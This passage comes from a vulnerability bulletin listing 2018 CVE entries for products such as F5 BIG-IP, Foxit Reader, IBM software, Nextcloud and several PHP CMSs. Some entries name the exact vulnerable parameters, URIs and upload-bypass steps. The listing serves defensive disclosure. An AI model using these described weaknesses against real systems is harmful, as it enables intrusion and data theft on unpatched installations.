    In BIG-IP 14.0.0-14.0.0.2, 13.0.0-13.1.0.7, 12.1.0-12.1.3.5, 11.6.0-11.6.3.2, or 11.2.1-11.5.6, an attacker sending specially crafted SSL records to a SSL Virtual Server will cause corruption in the SSL data structures leading to intermittent decrypt BAD_RECORD_MAC errors. Clients will be unable to access the application load balanced by a virtual server with an SSL profile until tmm is restarted.2018-10-31not yet calculatedCVE-2018-15317
    CONFIRM
    f5 -- multiple_productsWhen BIG-IP 14.0.0-14.0.0.2, 13.0.0-13.1.0.5, 12.1.0-12.1.3.5, 11.6.0-11.6.3.2, or 11.2.1-11.5.6, BIG-IQ Centralized Management 5.0.0-5.4.0 or 4.6.0, BIG-IQ Cloud and Orchestration 1.0.0, iWorkflow 2.1.0-2.3.0, or Enterprise Manager 3.1.1 is licensed for Appliance Mode, Admin and Resource administrator roles can by-pass BIG-IP Appliance Mode restrictions to overwrite critical system files. Attackers of high privilege level are able to overwrite critical system files which bypasses security controls in place to limit TMSH commands. This is possible with an administrator or resource administrator roles when granted TMSH. Resource administrator roles must have TMSH access in order to perform this attack.2018-10-31not yet calculatedCVE-2018-15321
    CONFIRM
    f5 -- multiple_productsOn BIG-IP 14.0.0-14.0.0.2, 13.0.0-13.1.0.7, 12.1.0-12.1.3.5, 11.6.0-11.6.3.2, or 11.2.1-11.5.6, BIG-IQ Centralized Management 6.0.0-6.0.1, 5.0.0-5.4.0 or 4.6.0, BIG-IQ Cloud and Orchestration 1.0.0, iWorkflow 2.0.1-2.3.0, or Enterprise Manager 3.1.1 a BIG-IP user granted with tmsh access may cause the BIG-IP system to experience denial-of-service (DoS) when the BIG-IP user uses the tmsh utility to run the edit cli preference command and proceeds to save the changes to another filename repeatedly. This action utilises storage space on the /var partition and when performed repeatedly causes the /var partition to be full.2018-10-31not yet calculatedCVE-2018-15322
    CONFIRM
    foxit -- phantompdf
     
    This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit PhantomPDF Phantom PDF 9.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within fxhtml2pdf. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-6230.2018-10-29not yet calculatedCVE-2018-17706
    CONFIRM
    MISC
    foxit -- readerThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.1.0.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of OCG objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6435.2018-10-29not yet calculatedCVE-2018-17624
    CONFIRM
    MISC
    foxit -- readerThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of onFocus events. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6335.2018-10-29not yet calculatedCVE-2018-17617
    CONFIRM
    MISC
    foxit -- readerThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Calculate events. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6353.2018-10-29not yet calculatedCVE-2018-17620
    CONFIRM
    MISC
    foxit -- readerThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Validate events. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6352.2018-10-29not yet calculatedCVE-2018-17619
    CONFIRM
    MISC
    foxit -- readerThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of onBlur events. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6334.2018-10-29not yet calculatedCVE-2018-17616
    CONFIRM
    MISC
    foxit -- readerThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Selection Change events. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6336.2018-10-29not yet calculatedCVE-2018-17618
    CONFIRM
    MISC
    foxit -- readerThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Format events. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6355.2018-10-29not yet calculatedCVE-2018-17621
    CONFIRM
    MISC
    foxit -- readerThis vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 9.1.0.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Calculate events. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6354.2018-10-29not yet calculatedCVE-2018-17622
    CONFIRM
    MISC
    foxit -- readerThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Link objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6434.2018-10-29not yet calculatedCVE-2018-17623
    CONFIRM
    MISC
    foxit -- reader
     
    This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.5096. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Mouse Exit events. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-6333.2018-10-29not yet calculatedCVE-2018-17615
    CONFIRM
    MISC
    fr.sauter_ag -- case_suite
     
    An XXE vulnerability exists in CASE Suite Versions 3.10 and prior when processing parameter entities, which may allow remote file disclosure.2018-11-02not yet calculatedCVE-2018-17912
    MISC
    gnu -- binutilsAn issue was discovered in cp-demangle.c in GNU libiberty, as distributed in GNU Binutils 2.31. There is a stack consumption vulnerability resulting from infinite recursion in the functions next_is_type_qual() and cplus_demangle_type() in cp-demangle.c. Remote attackers could leverage this vulnerability to cause a denial-of-service via an ELF file, as demonstrated by nm.2018-10-29not yet calculatedCVE-2018-18701
    MISC
    gnu -- binutilsAn issue was discovered in cp-demangle.c in GNU libiberty, as distributed in GNU Binutils 2.31. There is a stack consumption vulnerability resulting from infinite recursion in the functions d_name(), d_encoding(), and d_local_name() in cp-demangle.c. Remote attackers could leverage this vulnerability to cause a denial-of-service via an ELF file, as demonstrated by nm.2018-10-29not yet calculatedCVE-2018-18700
    MISC
    gnu -- gettext
     
    An issue was discovered in GNU gettext 0.19.8. There is a double free in default_add_message in read-catalog.c, related to an invalid free in po_gram_parse in po-gram-gen.y, as demonstrated by lt-msgfmt.2018-10-29not yet calculatedCVE-2018-18751
    MISC
    MISC
    gopro -- gpmf-parser
     
    An issue was discovered in GoPro gpmf-parser 1.2.1. There is an out-of-bounds write in OpenMP4Source in GPMF_mp4reader.c. 2018-10-29not yet calculatedCVE-2018-18699
    MISC
    grapixel -- new_mediaGrapixel New Media v2.0 allows SQL Injection via the pages.aspx pageref parameter.2018-10-30not yet calculatedCVE-2018-18822
    EXPLOIT-DB
    green_electronics -- rainmachine_mini-8A Cross Site Request Forgery (CSRF) vulnerability in the Green Electronics RainMachine Mini-8 (2nd Generation) and Touch HD 12 web application allows an attacker to control the RainMachine device via the REST API.2018-11-01not yet calculatedCVE-2018-6907
    MISC
    green_electronics -- rainmachine_mini-8The time-based one-time-password (TOTP) function in the application logic of the Green Electronics RainMachine Mini-8 (2nd generation) uses the administrator's password hash to generate a 6-digit temporary passcode that can be used for remote and local access, aka a "Use of Password Hash Instead of Password for Authentication" issue. This is exploitable by an attacker who discovers a hash value in the rainmachine-settings.sqlite file.2018-11-01not yet calculatedCVE-2018-6011
    MISC
    green_electronics -- rainmachine_mini-8An authentication bypass vulnerability exists in the Green Electronics RainMachine Mini-8 (2nd Generation) and Touch HD 12 web application allowing an unauthenticated attacker to perform authenticated actions on the device via a 127.0.0.1:port value in the HTTP 'Host' header, as demonstrated by retrieving credentials.2018-11-01not yet calculatedCVE-2018-6908
    MISC
    green_electronics -- rainmachine_mini-8A missing X-Frame-Options header in the Green Electronics RainMachine Mini-8 (2nd Generation) and Touch HD 12 web application could be used by a remote attacker for clickjacking, as demonstrated by triggering an API page request.2018-11-01not yet calculatedCVE-2018-6909
    MISC
    green_electronics -- rainmachine_mini-8A persistent Cross Site Scripting (XSS) vulnerability in the Green Electronics RainMachine Mini-8 (2nd Generation) and Touch HD 12 web application allows an attacker to inject arbitrary JavaScript via the REST API.2018-11-01not yet calculatedCVE-2018-6906
    MISC
    green_electronics -- rainmachine_mini-8
     
    The 'Weather Service' feature of the Green Electronics RainMachine Mini-8 (2nd generation) allows an attacker to inject arbitrary Python code via the 'Add new weather data source' upload function.2018-11-01not yet calculatedCVE-2018-6012
    MISC
    gthumb -- gthumb
     
    An issue was discovered in gThumb through 3.6.2. There is a double-free vulnerability in the add_themes_from_dir method in dlg-contact-sheet.c because of two successive calls of g_free, each of which frees the same buffer.2018-10-29not yet calculatedCVE-2018-18718
    MISC
    ibm -- daeja_viewone
     
    IBM Daeja ViewONE Professional, Standard & Virtual 5 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 150514.2018-11-02not yet calculatedCVE-2018-1835
    CONFIRM
    XF
    ibm -- infosphere_master_data_management_collaboration_serverIBM InfoSphere Master Data Management Collaboration Server 11.4, 11.5, and 11.6 could allow an authenticated user with CA level access to change change their ca-id to another users and read sensitive information. IBM X-Force ID: 138077.2018-10-29not yet calculatedCVE-2018-1380
    XF
    CONFIRM
    ibm -- quality_manager
     
    IBM Quality Manager (RQM) 5.0 through 5.0.2 and 6.0 through 6.0.6 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 132929.2018-11-02not yet calculatedCVE-2017-1609
    CONFIRM
    XF
    ibm -- rational_engineering_lifecycle_manager
     
    IBM Rational Engineering Lifecycle Manager 5.0 through 5.0.2 and 6.0 through 6.0.6 are vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 150945.2018-11-02not yet calculatedCVE-2018-1846
    CONFIRM
    XF
    ibm -- robotic_process_automation_with_automation_anywhereIBM Robotic Process Automation with Automation Anywhere 11 could under certain cases, display the password in a Control Room log file after installation. IBM X-Force ID: 151707.2018-11-02not yet calculatedCVE-2018-1876
    XF
    CONFIRM
    ibm -- robotic_process_automation_with_automation_anywhereIBM Robotic Process Automation with Automation Anywhere 11 could store highly sensitive information in the form of unencrypted passwords that would be available to a local user. IBM X-Force ID: 151713.2018-11-02not yet calculatedCVE-2018-1877
    CONFIRM
    XF
    ibm -- robotic_process_automation_with_automation_anywhereIBM Robotic Process Automation with Automation Anywhere 10.0 and 11.0 allows a remote attacker to execute arbitrary code on the system, caused by a missing restriction in which file types can be uploaded to the control room. By uploading a malicious file and tricking a victim to run it, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 142889.2018-11-02not yet calculatedCVE-2018-1552
    CONFIRM
    XF
    ibm -- robotic_process_automation_with_automation_anywhere
     
    IBM Robotic Process Automation with Automation Anywhere 11 could disclose sensitive information in a web request that could aid in future attacks against the system. IBM X-Force ID: 151714.2018-11-02not yet calculatedCVE-2018-1878
    XF
    CONFIRM
    ibm -- spectrum_protect_server
     
    IBM Spectrum Protect Server 7.1 and 8.1 could disclose highly sensitive information via trace logs to a local privileged user. IBM X-Force ID: 148873.2018-11-02not yet calculatedCVE-2018-1788
    CONFIRM
    XF
    ibm -- team_concert
     
    IBM Team Concert (RTC) 5.0 through 5.0.2 and 6.0 through 6.0.5 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 148620.2018-10-29not yet calculatedCVE-2018-1766
    CONFIRM
    XF
    ibm -- websphere_application_serverIBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 Cachemonitor is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 148621.2018-10-29not yet calculatedCVE-2018-1767
    SECTRACK
    XF
    CONFIRM
    ibm -- websphere_application_server_liberty_openid_connect
     
    IBM WebSphere Application Server Liberty OpenID Connect could allow a remote attacker to execute arbitrary code on the system, caused by improper deserialization. By sending a specially-crafted request to the RP service, an attacker could exploit this vulnerability to execute arbitrary code. IBM X-Force ID: 150999.2018-10-31not yet calculatedCVE-2018-1851
    XF
    CONFIRM
    icms -- icms
     
    spider.admincp.php in iCMS v7.0.11 allows SQL injection via admincp.php?app=spider&do=import_rule because the upfile content is base64 decoded, deserialized, and used for database insertion.2018-10-29not yet calculatedCVE-2018-18702
    MISC
    indusoft -- web_studioInduSoft Web Studio versions prior to 8.1 SP2, and InTouch Edge HMI (formerly InTouch Machine Edition) versions prior to 2017 SP2. A remote attacker could send a carefully crafted packet to exploit a stack-based buffer overflow vulnerability during tag, alarm, or event related actions such as read and write, with potential for code to be executed. If InduSoft Web Studio remote communication security was not enabled, or a password was left blank, a remote user could send a carefully crafted packet to invoke an arbitrary process, with potential for code to be executed. The code would be executed under the privileges of the InduSoft Web Studio or InTouch Edge HMI runtime and could lead to a compromise of the InduSoft Web Studio or InTouch Edge HMI server machine.2018-11-02not yet calculatedCVE-2018-17916
    MISC
    MISC
    indusoft -- web_studio
     
    InduSoft Web Studio versions prior to 8.1 SP2, and InTouch Edge HMI (formerly InTouch Machine Edition) versions prior to 2017 SP2. This vulnerability could allow an unauthenticated user to remotely execute code with the same privileges as that of the InduSoft Web Studio or InTouch Edge HMI (formerly InTouch Machine Edition) runtime.2018-11-02not yet calculatedCVE-2018-17914
    MISC
    MISC
    interactive_advertising_bureau -- openrtb
     
    The Interactive Advertising Bureau (IAB) OpenRTB 2.3 protocol implementation might allow remote attackers to conceal the status of ad transactions and potentially compromise bid integrity by leveraging failure to limit the time between bid responses and impression notifications, aka the Amnesia Bug.2018-10-30not yet calculatedCVE-2015-7266
    MISC
    iobit -- malware_fighter
     
    RegFilter.sys in IOBit Malware Fighter 6.2 and earlier is susceptible to a stack-based buffer overflow when an attacker uses IOCTL 0x8006E010. This can lead to denial of service (DoS) or code execution with root privileges.2018-11-01not yet calculatedCVE-2018-18714
    MISC
    jasper -- jasper
     
    An issue was discovered in JasPer 2.0.14. There is a NULL pointer dereference in the function ras_putdatastd in ras/ras_enc.c.2018-10-31not yet calculatedCVE-2018-18873
    MISC
    jboss -- bpm_suite
     
    JBoss BPM Suite 6 is vulnerable to a reflected XSS via dashbuilder. Remote attackers can entice authenticated users that have privileges to access dashbuilder (usually admins) to click on links to /dashbuilder/Controller containing malicious scripts. Successful exploitation would allow execution of script code within the context of the affected user.2018-10-31not yet calculatedCVE-2016-6343
    REDHAT
    BID
    REDHAT
    CONFIRM
    laravelcms -- laravelcms 
     
    An issue was discovered in laravelCMS through 2018-04-02. \app\Http\Controllers\Backend\ProfileController.php allows upload of arbitrary PHP files because the file extension is not properly checked and uploaded files are not properly renamed.2018-10-31not yet calculatedCVE-2018-18888
    MISC
    leostream -- agentThe Leostream Agent before Build 7.0.1.0 when used with Leostream Connection Broker 8.2.72 or earlier allows remote attackers to modify registry keys via the Leostream Agent API.2018-10-29not yet calculatedCVE-2018-18817
    MISC
    libav -- libavThere exists a NULL pointer dereference in ff_vc1_parse_frame_header_adv in vc1.c in Libav 12.3, which allows attackers to cause a denial-of-service through a crafted aac file.2018-10-30not yet calculatedCVE-2018-18829
    MISC
    libav -- libavThere exists a heap-based buffer overflow in vc1_decode_i_block_adv in vc1_block.c in Libav 12.3, which allows attackers to cause a denial-of-service via a crafted aac file.2018-10-30not yet calculatedCVE-2018-18828
    MISC
    libav -- libav
     
    There exists a heap-based buffer over-read in ff_vc1_pred_dc in vc1_block.c in Libav 12.3, which allows attackers to cause a denial-of-service via a crafted aac file.2018-10-30not yet calculatedCVE-2018-18827
    MISC
    libav -- libav
     
    There exists a heap-based buffer overflow in vc1_decode_p_mb_intfi in vc1_block.c in Libav 12.3, which allows attackers to cause a denial-of-service via a crafted aac file.2018-10-30not yet calculatedCVE-2018-18826
    MISC
    libexif -- libexif
     
    A vulnerability was found in libexif. An integer overflow when parsing the MNOTE entry data of the input file. This can cause Denial-of-Service (DoS) and Information Disclosure (disclosing some critical heap chunk metadata, even other applications' private data).2018-10-31not yet calculatedCVE-2016-6328
    CONFIRM
    libiec61850 -- libiec61850
     
    An issue has been found in libIEC61850 v1.3. It is a heap-based buffer overflow in BerEncoder_encodeOctetString in mms/asn1/ber_encoder.c.2018-10-30not yet calculatedCVE-2018-18834
    MISC
    MISC
    libnmapp -- libnmapp
     
    A command injection vulnerability in libnmapp package for versions <0.4.16 allows arbitrary commands to be executed via arguments to the range options.2018-10-30not yet calculatedCVE-2018-16461
    MISC
    libsdl -- sdl_image
     
    An exploitable code execution vulnerability exists in the XCF image rendering functionality of SDL2_image-2.0.3. A specially crafted XCF image can cause a heap overflow, resulting in code execution. An attacker can display a specially crafted image to trigger this vulnerability.2018-11-01not yet calculatedCVE-2018-3977
    MISC
    libtiff -- libtiff
     
    An issue was discovered in LibTIFF 4.0.9. There is a NULL pointer dereference in the function LZWDecode in the file tif_lzw.c.2018-10-26not yet calculatedCVE-2018-18661
    MISC
    BID
    linux -- kernelSince Linux kernel version 3.2, the mremap() syscall performs TLB flushes after dropping pagetable locks. If a syscall such as ftruncate() removes entries from the pagetables of a task that is in the middle of mremap(), a stale TLB entry can remain for a short time that permits access to a physical page after it has been released back to the page allocator and reused. This is fixed in the following kernel versions: 4.9.135, 4.14.78, 4.18.16, 4.19.2018-10-30not yet calculatedCVE-2018-18281
    MISC
    MLIST
    BID
    MISC
    CONFIRM
    CONFIRM
    CONFIRM
    CONFIRM
    linux -- kernelIn the Linux kernel before 4.17, a local attacker able to set attributes on an xfs filesystem could make this filesystem non-operational until the next mount by triggering an unchecked error condition during an xfs attribute change, because xfs_attr_shortform_addname in fs/xfs/libxfs/xfs_attr.c mishandles ATTR_REPLACE operations with conversion of an attr from short to long form.2018-10-26not yet calculatedCVE-2018-18690
    MISC
    BID
    MISC
    MISC
    MISC
    linux -- kernelAn issue was discovered in the Linux kernel through 4.19. An information leak in cdrom_ioctl_select_disc in drivers/cdrom/cdrom.c could be used by local attackers to read kernel memory because a cast from unsigned long to int interferes with bounds checking. This is similar to CVE-2018-10940 and CVE-2018-16658.2018-10-29not yet calculatedCVE-2018-18710
    MISC
    MISC
    linux -- kernel
     
    The Linux kernel, as used in Ubuntu 18.04 LTS and Ubuntu 18.10, allows local users to obtain names of files in which they would not normally be able to access via an overlayfs mount inside of a user namespace.2018-10-26not yet calculatedCVE-2018-6559
    BID
    CONFIRM
    CONFIRM
    CONFIRM
    lulu -- cms
     
    An issue was discovered in LuLu CMS through 2015-05-14. backend\modules\filemanager\controllers\DefaultController.php allows arbitrary file upload by entering a filename, directory name, and PHP code into the three text input fields.2018-10-29not yet calculatedCVE-2018-18771
    MISC
    m2soft -- report_designer_viewer
     
    M2SOFT Report Designer Viewer 5.0 allows a Buffer Overflow with Extended Instruction Pointer (EIP) control via a crafted MRD file.2018-11-01not yet calculatedCVE-2018-18695
    MISC
    mantisbt -- mantisbtA cross-site scripting (XSS) vulnerability in the Edit Filter page (manage_filter_edit page.php) in MantisBT 2.1.0 through 2.17.1 allows remote attackers (if access rights permit it) to inject arbitrary code (if CSP settings permit it) through a crafted project name.2018-10-30not yet calculatedCVE-2018-17783
    CONFIRM
    CONFIRM
    mantisbt -- mantisbt
     
    A cross-site scripting (XSS) vulnerability in the Manage Filters page (manage_filter_page.php) in MantisBT 2.1.0 through 2.17.1 allows remote attackers (if access rights permit it) to inject arbitrary code (if CSP settings permit it) through a crafted project name.2018-10-30not yet calculatedCVE-2018-17782
    CONFIRM
    CONFIRM
    mcms -- mcms
     
    An issue was discovered in com\mingsoft\basic\action\web\FileAction.java in MCMS 4.6.5. Since the upload interface does not verify the user login status, you can use this interface to upload files without setting a cookie. First, start an upload of JSP code with a .png filename, and then intercept the data packet. In the name parameter, change the suffix to jsp. In the response, the server returns the storage path of the file, which can be accessed to execute arbitrary JSP code.2018-10-30not yet calculatedCVE-2018-18830
    MISC
    merge_package -- merge_package
     
    The merge.recursive function in the merge package v <1.2 can be tricked into adding or modifying properties of the Object prototype. These properties will be present on all objects allowing for a denial of service attack.2018-10-30not yet calculatedCVE-2018-16469
    MISC
    microstrategy -- webDirectory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.2018-11-01not yet calculatedCVE-2018-18777
    MISC
    EXPLOIT-DB
    microstrategy -- webMicrostrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the admin/admin.asp ShowAll parameter. NOTE: this is a deprecated product.2018-11-01not yet calculatedCVE-2018-18776
    MISC
    EXPLOIT-DB
    microstrategy -- web
     
    Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter. NOTE: this is a deprecated product.2018-11-01not yet calculatedCVE-2018-18775
    MISC
    EXPLOIT-DB
    mingsoft -- mcms
     
    An issue was discovered in com\mingsoft\cms\action\GeneraterAction.java in MCMS 4.6.5. An attacker can write a .jsp file (in the position parameter) to an arbitrary directory via a ../ Directory Traversal in the url parameter.2018-10-30not yet calculatedCVE-2018-18831
    MISC
    minicms -- minicms
     
    MiniCMS 1.10 allows execution of arbitrary PHP code via the install.php sitename parameter, which affects the site_name field in mc_conf.php.2018-10-31not yet calculatedCVE-2018-18892
    MISC
    MISC
    minicms -- minicms
     
    MiniCMS 1.10 allows full path disclosure via /mc-admin/post.php?state=delete&delete= with an invalid filename.2018-10-31not yet calculatedCVE-2018-18890
    MISC
    MISC
    minicms -- minicms
     
    MiniCMS 1.10 allows file deletion via /mc-admin/post.php?state=delete&delete= because the authentication check occurs too late.2018-10-31not yet calculatedCVE-2018-18891
    MISC
    MISC
    monstra -- cms
     
    admin/index.php?id=filesmanager in Monstra CMS 3.0.4 allows remote authenticated administrators to trigger stored XSS via JavaScript content in a file whose name lacks an extension. Such a file is interpreted as text/html in certain cases.2018-10-29not yet calculatedCVE-2018-18694
    MISC
    nc-cms -- nc-cms
     
    nc-cms through 2017-03-10 allows remote attackers to execute arbitrary PHP code via the "Upload File or Image" feature, with a .php filename and "Content-Type: application/octet-stream" to the index.php?action=file_manager_upload URI.2018-10-31not yet calculatedCVE-2018-18874
    MISC
    netgain -- enterprise_managerNetGain Enterprise Manager (EM) is affected by OS Command Injection vulnerabilities in versions before 10.0.57. These vulnerabilities could allow remote authenticated attackers to inject arbitrary code, resulting in remote code execution.2018-11-01not yet calculatedCVE-2018-10587
    MISC
    netgain -- enterprise_manager
     
    NetGain Enterprise Manager (EM) is affected by multiple Stored Cross-Site Scripting (XSS) vulnerabilities in versions before 10.1.12.2018-11-01not yet calculatedCVE-2018-10586
    MISC
    nextcloud -- serverA missing access check in Nextcloud Server prior to 14.0.0 could lead to continued access to password protected link shares when the owner had changed the password.2018-10-30not yet calculatedCVE-2018-16464
    MISC
    MISC
    nextcloud -- serverMissing state in Nextcloud Server prior to 14.0.0 would not enforce the use of a second factor at login if the the provider of the second factor failed to load.2018-10-30not yet calculatedCVE-2018-16465
    MISC
    MISC
    nextcloud -- serverA missing check in Nextcloud Server prior to 14.0.0 could give unauthorized access to the previews of single file password protected shares.2018-10-30not yet calculatedCVE-2018-16467
    MISC
    MISC
    nextcloud -- serverImproper revalidation of permissions in Nextcloud Server prior to 14.0.0, 13.0.6 and 12.0.11 lead to not accepting access restrictions by acess tokens.2018-10-30not yet calculatedCVE-2018-16466
    MISC
    MISC
    nextcloud -- server
     
    A bug causing session fixation in Nextcloud Server prior to 14.0.0, 13.0.3 and 12.0.8 could potentially allow an attacker to obtain access to password protected shares.2018-10-30not yet calculatedCVE-2018-16463
    MISC
    MISC
    no-cms -- no-cms
     
    No-CMS 1.1.3 is prone to Persistent XSS via a contact_us name parameter, as demonstrated by the VG48Z5PqVWname parameter.2018-10-31not yet calculatedCVE-2018-18868
    MISC
    octopus -- deploy
     
    In Octopus Deploy 2018.8.0 through 2018.9.x before 2018.9.1, an authenticated user with permission to modify deployment processes could upload a maliciously crafted YAML configuration, potentially allowing for remote execution of arbitrary code, running in the same context as the Octopus Server (for self-hosted installations by default, SYSTEM).2018-10-30not yet calculatedCVE-2018-18850
    MISC
    openssl -- dsa
     
    The OpenSSL DSA signature algorithm has been shown to be vulnerable to a timing side channel attack. An attacker could use variations in the signing algorithm to recover the private key. Fixed in OpenSSL 1.1.1a-dev (Affected 1.1.1). Fixed in OpenSSL 1.1.0j-dev (Affected 1.1.0-1.1.0i). Fixed in OpenSSL 1.0.2q-dev (Affected 1.0.2-1.0.2p).2018-10-30not yet calculatedCVE-2018-0734
    BID
    CONFIRM
    CONFIRM
    CONFIRM
    CONFIRM
    openssl -- ecdsa
     
    The OpenSSL ECDSA signature algorithm has been shown to be vulnerable to a timing side channel attack. An attacker could use variations in the signing algorithm to recover the private key. Fixed in OpenSSL 1.1.0j-dev (Affected 1.1.0-1.1.0i). Fixed in OpenSSL 1.1.1a-dev (Affected 1.1.1).2018-10-29not yet calculatedCVE-2018-0735
    BID
    SECTRACK
    CONFIRM
    CONFIRM
    CONFIRM
    openstack-mistral -- openstack-mistral
     
    A flaw was found in openstack-mistral. By manipulating the SSH private key filename, the std.ssh action can be used to disclose the presence of arbitrary files within the filesystem of the executor running the action. Since std.ssh private_key_filename can take an absolute path, it can be used to assess whether or not a file exists on the executor's filesystem.2018-11-02not yet calculatedCVE-2018-16849
    CONFIRM
    CONFIRM
    pagoda -- linux_panel
     
    Pagoda Linux panel V6.0 has XSS via the verification code associated with an invalid account login. A crafted code is mishandled during rendering of the login log.2018-10-30not yet calculatedCVE-2018-18825
    MISC
    phptpoint -- hospital_management_system
     
    PhpTpoint hospital management system suffers from multiple SQL injection vulnerabilities via the index.php user parameter associated with LOGIN.php, or the rno parameter to ALIST.php, DUNDEL.php, PDEL.php, or PUNDEL.php.2018-10-29not yet calculatedCVE-2018-18705
    MISC
    phptpoint -- mailing_server_using_file_handling
     
    PhpTpoint Mailing Server Using File Handling 1.0 suffers from multiple Arbitrary File Read vulnerabilities in different sections that allow an attacker to read sensitive files on the system via directory traversal, bypassing the login page, as demonstrated by the Mailserver_filesystem/home.php coninb, consent, contrsh, condrft, or conspam parameter.2018-10-29not yet calculatedCVE-2018-18703
    MISC
    phptpoint -- pharmacy_management_system
     
    PhpTpoint Pharmacy Management System suffers from a SQL injection vulnerability in the index.php username parameter.2018-10-29not yet calculatedCVE-2018-18704
    EXPLOIT-DB
    phpyun -- phpyum
     
    The function down_sql_action() in /admin/model/database.class.php in PHPYun 4.6 allows remote attackers to read arbitrary files via directory traversal in an m=database&c=down_sql&name=../ URI.2018-10-29not yet calculatedCVE-2018-18713
    MISC
    MISC
    pivotal -- operations_manager
     
    Pivotal Operations Manager, versions 2.0.x prior to 2.0.24, versions 2.1.x prior to 2.1.15, versions 2.2.x prior to 2.2.7, and versions 2.3.x prior to 2.3.1, grants all users a scope which allows for privilege escalation. A remote malicious user who has been authenticated may create a new client with administrator privileges for Opsman.2018-11-02not yet calculatedCVE-2018-15762
    CONFIRM
    playsms -- playsms
     
    playSMS through 1.4.2 allows Privilege Escalation through Daemon abuse.2018-10-29not yet calculatedCVE-2018-18387
    MISC
    poppler -- poppler
     
    An issue was discovered in Poppler 0.71.0. There is a memory leak in GfxColorSpace::setDisplayProfile in GfxState.cc, as demonstrated by pdftocairo.2018-11-02not yet calculatedCVE-2018-18897
    MISC
    powerdns -- authoritative_server
     
    An issue has been found in PowerDNS Authoritative Server versions up to and including 3.4.10, 4.0.1 allowing an authorized user to crash the server by inserting a specially crafted record in a zone under their control then sending a DNS query for that record. The issue is due to an integer overflow when checking if the content of the record matches the expected size, allowing an attacker to cause a read past the buffer boundary.2018-11-01not yet calculatedCVE-2016-2120
    CONFIRM
    DEBIAN
